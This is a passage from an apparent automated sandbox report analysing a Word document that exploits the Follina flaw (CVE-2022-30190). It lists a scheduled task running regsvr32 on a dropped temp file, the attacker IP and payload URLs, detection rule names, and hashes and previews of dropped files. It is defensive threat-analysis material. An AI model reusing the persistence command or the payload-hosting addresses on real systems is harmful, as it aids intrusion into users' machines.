                                                                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, licensing.mp.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                                      Simulations

                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                      19:52:07Task SchedulerRun new task: swyghewz path: regsvr32.exe s>-s "C:\Users\user\AppData\Local\Temp\t1.A"

                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                      IPs

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      185.234.247.11968101181_048154.imgGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.119/1240405476.dat
                                                                                                                                                                      doc782.docxGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.119/1676044147.dat
                                                                                                                                                                      doc782.docxGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.119/123.RES

                                                                                                                                                                      Domains

                                                                                                                                                                      No context

                                                                                                                                                                      ASNs

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      INTERKONEKT-ASPLdoc782.docxGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.119
                                                                                                                                                                      68101181_048154.imgGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.119
                                                                                                                                                                      doc782.docxGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.119
                                                                                                                                                                      doc782.docxGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.119
                                                                                                                                                                      M7AGbBLqPe.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      dAVm0vglvu.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      iWHrAvsZxg.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      pSoGvctFnD.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      mkKVoBF44Y.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      dc5c22ee0782235867ae0363443252f867d0bae4056cd.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      h85KhVVyq2.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      ldpyj89Wrg.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      P56AN03wpC.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      w0B7F0ChKW.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      l4SuvN8suj.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      PBnbTen4kq.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      q1n36V9S8C.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      IhTREoj3J9.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      OYc1IC0G1F.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      wwEndQY5px.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35

                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                      No context

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll68101181_048154.imgGet hashmaliciousBrowse
                                                                                                                                                                        doc782.docxGet hashmaliciousBrowse
                                                                                                                                                                          doc1712.docxGet hashmaliciousBrowse
                                                                                                                                                                            R346ltaP9w.rtfGet hashmaliciousBrowse
                                                                                                                                                                              VIP Invitation to Doha Expo 2023.docxGet hashmaliciousBrowse
                                                                                                                                                                                WykHEO9BQN.rtfGet hashmaliciousBrowse
                                                                                                                                                                                  lol666 (2).batGet hashmaliciousBrowse
                                                                                                                                                                                    EISPv0c56U.docGet hashmaliciousBrowse
                                                                                                                                                                                      mjpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                                                        mjpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                                                          05-2022-0438.docGet hashmaliciousBrowse

                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:Microsoft Access Database
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):528384
                                                                                                                                                                                            Entropy (8bit):0.475473229136101
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:hGfXQVJCC88SFyfZ0jGBtRe7JJWzwtZ1Ia+hVZO4Fg:kfX+ClHeZPaSz/5I
                                                                                                                                                                                            MD5:766811A42870AEE1D9D9EDC5CF39B751
                                                                                                                                                                                            SHA1:4CCD5DD755B159D32716FBBEECA2B33FC67B1466
                                                                                                                                                                                            SHA-256:88640A8D62914E568A7ADA112DCC06DED81028F1375883BC60575D8BEC2F20D7
                                                                                                                                                                                            SHA-512:B3CF99A75F5480D9FC6E60D2EBF0EABFC5C775CE7C7BDB7227D7A7149A63431BC2A602352A36B687D877410ECD661E044A22445ED2C96840A7AD439E90245E89
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N)U.7...i.(...`.:{6Z...Z.C`..3..y[=.|*..|......6...f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):36
                                                                                                                                                                                            Entropy (8bit):2.730660070105504
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                                            MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                                            SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                                            SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                                            SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                            Entropy (8bit):1.4172860556164644
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:GUfFF/FaV:DtFdu
                                                                                                                                                                                            MD5:C2AC3C4E2F040FECC0C759333329FC5F
                                                                                                                                                                                            SHA1:D60D4854A23808FD2D67A20DDD9001D5567B1F53
                                                                                                                                                                                            SHA-256:F42C7EE07D25E6BCABCFDA1B8EA31928008FDA1A2C51E8D5C08410E6802EF2F3
                                                                                                                                                                                            SHA-512:5EFBE74E618899E05B228FB255CBF20468ED9303723F508202CED231FB0CAD966A92D7F092FC286CA5211EB8F56A0C6EA5CD742D94003064E7C42D92137C9DF8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:855271. Admin.

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DD77C7D6-2AC5-4FD4-86E9-418877D1BD59

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):147863
                                                                                                                                                                                            Entropy (8bit):5.3589579589937095
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:PcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:OHQ9DQW+zIXLI
                                                                                                                                                                                            MD5:87FB26E1D0012B07EAFADBCA4DB26C9C
                                                                                                                                                                                            SHA1:A1BCD06085146F821F90C29449DDBD0F7AF9161D
                                                                                                                                                                                            SHA-256:9086C5DAAE4C97AEA27959F6B9B69482E9C61E1D9BCF29B8AEB8DEBEA50C60EA
                                                                                                                                                                                            SHA-512:F5F02C2C0180D115EF3A3B1BFD025BE299609A1029527349079BAA492B0521BA5E8255B7F38AC0F9FFC323352B549AAB220B3222D066D89A7702CCA29F6C2C2B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-07T17:50:06">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6241
                                                                                                                                                                                            Entropy (8bit):4.836014560592255
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                                            MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                                            SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                                            SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                                            SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, Author: Joe Security
                                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6241
                                                                                                                                                                                            Entropy (8bit):4.836014560592255
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                                            MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                                            SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                                            SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                                            SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, Author: Joe Security
                                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{677538CC-22A1-43D9-BD9A-C629280F1C4E}.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2130
                                                                                                                                                                                            Entropy (8bit):1.1618571236537212
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRnyOLfEznRnyOLflqDmPm1SXV5:mbb2sOhYk5vnZA5Rn/YnRn/doQ5
                                                                                                                                                                                            MD5:4F8C0EAC84D2D1AEEDABF24EF834DEFF
                                                                                                                                                                                            SHA1:7B75446CBB512AD6C13F12A35948E1548FD62864
                                                                                                                                                                                            SHA-256:8FB6FE075C6777639474427C864A13E5EAB1ECF7016DD1C23B9CA8FA7A7D0188
                                                                                                                                                                                            SHA-512:83839667E41A748A703F80D0CE533F37922433973EFC0949D34D2B3E7FFC8548A04682D97A1457CB7E92C667541EBB2BED0432A59084558A4BBE5E1CE8567494
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:....S.H.A.P.E. .X. .\.*. .M.E.R.G.E.F.O.R.M.A.T... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0...2...6...D...F...D...F...J...N...P.............................................................................................................................................................................................................................................................................................................................................................................................................................j....U....j....U...*....j....U

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9637A4EF-9FF4-43D0-9F94-84AF1936C274}.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1024
                                                                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6241
                                                                                                                                                                                            Entropy (8bit):4.836014560592255
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                                            MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                                            SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                                            SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                                            SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, Author: Joe Security
                                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].htm (copy)

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6241
                                                                                                                                                                                            Entropy (8bit):4.836014560592255
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                                            MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                                            SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                                            SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                                            SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):9728
                                                                                                                                                                                            Entropy (8bit):4.79749305864191
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:WKqedmYoNKvUTCSH3gR8H8FgwSHwBnkwZYPaSJ365OOieMjQZa2RnIj2K:bElNK8TCSfHyPnkwZ+vKOBQZXn2
                                                                                                                                                                                            MD5:A3852564CA718AB40C68A255EEB0F8DF
                                                                                                                                                                                            SHA1:3A99D23AB2B157C0BD759FCA73047F8BB8611EF4
                                                                                                                                                                                            SHA-256:D05D1D1CAA819EEFFF6121EE9E746D96360EC76D8CFD77FFD8736CF9EFFCEB66
                                                                                                                                                                                            SHA-512:19134AB877F434B2564239218B5CB0865114D90E804673EE53980A685869134296A5347009E0AC37B43BB3E6D1E6FD821FC74EA65474BA2240DC687C1BB02F06
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                            Entropy (8bit):3.1008166912794564
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryO+PfGak7Ynqq1+PfXPN5Dlq5J:+RI+ycuZhNt+akSKfPNnqX
                                                                                                                                                                                            MD5:CCEC6FC0B20BEA34F917C387969FA636
                                                                                                                                                                                            SHA1:03EC62AE92518E8478297BD1F7A197EF0D71E113
                                                                                                                                                                                            SHA-256:BE61BE9DA2757D7EE9A09F1C07D6B13D60515FFC7417BA6C3FC503A0094B499A
                                                                                                                                                                                            SHA-512:9656E5185B2A211A44200B19D59A3E810D02D7FEAD0BE833064D4CDF914C4808CFFD5F8B00B14FBCF31E2FE9DD54302E100E2045E9FE9C7C0F0EC8B469EB5698
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.1.r.k.p.2.k.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.1.r.k.p.2.k.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\RES1B1C.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1364
                                                                                                                                                                                            Entropy (8bit):4.093180645604145
                                                                                                                                                                                            Encrypted:false
